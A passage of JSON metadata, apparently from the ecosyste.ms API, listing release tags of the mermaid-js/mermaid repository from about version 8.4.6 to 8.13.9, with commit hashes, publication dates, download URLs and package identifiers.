/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.9/manifests"},{"name":"8.13.8","sha":"65592e0541790968703f16bc0b91a641b5443111","kind":"commit","published_at":"2021-12-28T16:31:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.8/manifests"},{"name":"8.13.7","sha":"52af0476c14be9f98d669e336a5625f5fb609aee","kind":"commit","published_at":"2021-12-22T20:20:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.7/manifests"},{"name":"8.13.6","sha":"a44714c715e49ff2dc86a401962dc5929b6eca06","kind":"commit","published_at":"2021-12-16T19:06:50.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.6/manifests"},{"name":"real-8.13.5","sha":"7da80812e0510ae04f9ebf3a151a048ef9ce6834","kind":"commit","published_at":"2021-12-08T06:53:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/real-8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/real-8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@real-8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/real-8.13.5/manifests"},{"name":"8.13.5","sha":"2ce18ec2a8c6f6c2ece20f749628443ac663119f","kind":"commit","published_at":"2021-12-07T22:09:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.5/manifests"},{"name":"8.13.4","sha":"650bcef3d1f940aec0cf4b81d1433b74b5e0f55c","kind":"commit","published_at":"2021-11-18T16:11:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.4/manifests"},{"name":"8.13.3","sha":"0d7d5ddc5fbd8482dd7e907d3eef41cd1240f68f","kind":"commit","published_at":"2021-10-14T19:19:28.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.3/manifests"},{"name":"8.13.2","sha":"2758d6477803dd9e5e8975b0d93b33c69be7b377","kind":"commit","published_at":"2021-09-29T18:22:45.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.2/manifests"},{"name":"8.13.1","sha":"029042393c795b4b3ef9c91ae66564610e4b0c89","kind":"commit","published_at":"2021-09-29T18:05:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.1/manifests"},{"name":"8.13.0","sha":"75b79e1b23f288e4706f21f62925c17c676cf4c0","kind":"commit","published_at":"2021-09-29T06:45:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.13.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.13.0/manifests"},{"name":"8.12.1","sha":"48b6a32fe19af7e600fb0df900aa5956159e52d7","kind":"commit","published_at":"2021-08-26T17:43:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.1/manifests"},{"name":"8.12.0","sha":"296a64f465021a8424cd72d495a24f4cc3c59c1e","kind":"commit","published_at":"2021-08-26T17:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.12.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.12.0/manifests"},{"name":"8.11.5","sha":"962998810bccd537365f7de45891ebba48487cde","kind":"commit","published_at":"2021-08-15T15:41:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.5/manifests"},{"name":"8.11.4","sha":"a670b678445f2894844ecbe7352f994396caa518","kind":"commit","published_at":"2021-08-05T17:58:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.4/manifests"},{"name":"8.11.3","sha":"af7f5d0aaf3ede2f2efca6f24ec527c4e7065e2f","kind":"commit","published_at":"2021-08-04T17:25:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.3/manifests"},{"name":"8.11.2","sha":"9245b0bb8b82c200c7c7a277cd619db6e5dd7715","kind":"commit","published_at":"2021-07-29T17:34:51.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.2/manifests"},{"name":"8.11.1","sha":"33e8ee6c0e8bfd03f5d3fee51237a156c2e5a537","kind":"commit","published_at":"2021-07-28T13:54:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.1/manifests"},{"name":"untagged-78173a5e15ffdf8f1e6a","sha":"52b1b23d4753a3d068e19052e5f4d25e88057517","kind":"commit","published_at":"2021-07-15T12:54:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-78173a5e15ffdf8f1e6a","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-78173a5e15ffdf8f1e6a","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-78173a5e15ffdf8f1e6a","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-78173a5e15ffdf8f1e6a/manifests"},{"name":"8.11.0-rc2","sha":"1d782678715699e8485480bff309adc2b648c7c1","kind":"commit","published_at":"2021-06-27T05:57:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0-rc2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0-rc2/manifests"},{"name":"8.11.0","sha":"eef4ef54a177c96b0efcf1c8c98f8d4d9f454e00","kind":"commit","published_at":"2021-06-25T10:27:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.11.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.11.0/manifests"},{"name":"untagged-f83ec2a9deaf6677e0c7","sha":"e6e94ad57ea06ef8627bf91ddfbd88f5082952bf","kind":"commit","published_at":"2021-06-05T10:11:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f83ec2a9deaf6677e0c7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f83ec2a9deaf6677e0c7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f83ec2a9deaf6677e0c7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f83ec2a9deaf6677e0c7/manifests"},{"name":"8.10.1","sha":"417428aceada045eabcc92826c68e08a1329c98f","kind":"commit","published_at":"2021-05-10T16:14:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.10.1/manifests"},{"name":"8.9.3","sha":"8b3ac57ce7e6ae6ea4a66a9d8a28d8fcde936bb9","kind":"commit","published_at":"2021-04-25T11:24:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.3/manifests"},{"name":"untagged-502e9410f3e7fd2ed484","sha":"45918da48ec99a706aa2b39598ae32cdccf95004","kind":"commit","published_at":"2021-04-25T10:27:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-502e9410f3e7fd2ed484","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-502e9410f3e7fd2ed484","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-502e9410f3e7fd2ed484","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-502e9410f3e7fd2ed484/manifests"},{"name":"8.9.2","sha":"a5cc75c1f7b722ebd0c2f848b25e2350655841dd","kind":"commit","published_at":"2021-03-18T20:02:49.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.2/manifests"},{"name":"8.9.1","sha":"be95b93a2d91d62bc8618b906356514232b4343d","kind":"commit","published_at":"2021-02-18T20:41:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.1/manifests"},{"name":"8.9.0","sha":"3c5da00230a586843364ff55f909fe27be2c0b41","kind":"tag","published_at":"2021-01-21T18:49:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.9.0/manifests"},{"name":"v8.8.4","sha":"d6b2bcf0d23af89f65de659d2d7edd32a41ccddc","kind":"tag","published_at":"2020-12-05T13:43:29.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v8.8.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v8.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v8.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v8.8.4/manifests"},{"name":"8.8.3","sha":"e3cf8b78437bb542029e91a022c81fbd4d361e6a","kind":"commit","published_at":"2020-11-05T19:09:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.3/manifests"},{"name":"8.8.2","sha":"0f9da18cbe9bea6021ab78553902e5a1a517d61a","kind":"commit","published_at":"2020-10-08T17:48:33.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.2/manifests"},{"name":"8.8.1","sha":"4dc805d25add19ae07ac9fe8951b4036332e0530","kind":"commit","published_at":"2020-09-30T17:23:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.1/manifests"},{"name":"8.8.0","sha":"0918b97e815ad77e8b8e88ebb52400937f197885","kind":"commit","published_at":"2020-09-05T07:46:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.8.0/manifests"},{"name":"8.7.0","sha":"4c38b1a776d83a00e12dd820b1bee455c3954e3c","kind":"commit","published_at":"2020-08-09T12:03:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.7.0/manifests"},{"name":"8.6.4","sha":"95b7e4f9adc560dfd2ec6cc2b1f43397b2641012","kind":"commit","published_at":"2020-07-26T12:09:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.4/manifests"},{"name":"8.6.3","sha":"d12b197ec951fa74574b4ef9fb95a55881cdd7a9","kind":"commit","published_at":"2020-07-24T06:28:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.3/manifests"},{"name":"8.6.2","sha":"f68536357415d16b239e04a98e6195227399557e","kind":"commit","published_at":"2020-07-22T17:22:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.2/manifests"},{"name":"8.6.0","sha":"b4203992bf98c209a578b1139c44d107b708ca6c","kind":"commit","published_at":"2020-07-13T14:42:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.6.0/manifests"},{"name":"8.5.2","sha":"e9e5c75decbd5f5bdcf6c9d63c8f8f553263f6e2","kind":"commit","published_at":"2020-06-07T08:39:21.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.2/manifests"},{"name":"8.5.1","sha":"9470a4f1edc0d0d5b8398e2c41029895fa5f738a","kind":"tag","published_at":"2020-05-17T08:12:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.5.1/manifests"},{"name":"untagged-566ebfbf21141b604025","sha":"0ac48a431a319b2ff7aaaef889ddd53f153acc6d","kind":"commit","published_at":"2020-05-13T17:32:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-566ebfbf21141b604025","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-566ebfbf21141b604025","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-566ebfbf21141b604025","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-566ebfbf21141b604025/manifests"},{"name":"untagged-31c93788afe260d914bb","sha":"5bdffd7d20c5622540c691ba63f635b8eedabf40","kind":"commit","published_at":"2020-04-11T16:10:53.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-31c93788afe260d914bb","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-31c93788afe260d914bb","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-31c93788afe260d914bb","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-31c93788afe260d914bb/manifests"},{"name":"8.4.8","sha":"1c07e550bb5fee590f69a1f7892e481a2cf53cff","kind":"commit","published_at":"2020-02-21T09:23:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.8/manifests"},{"name":"untagged-7651dabb407ecd5631ce","sha":"98229a47b298f4124d88347edbd56357866df7ee","kind":"commit","published_at":"2020-02-16T11:46:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-7651dabb407ecd5631ce","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-7651dabb407ecd5631ce","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-7651dabb407ecd5631ce","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-7651dabb407ecd5631ce/manifests"},{"name":"8.4.6","sha":"4805394e612c836bf27710794ce6f9aa86b7ac60","kind":"tag","published_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020"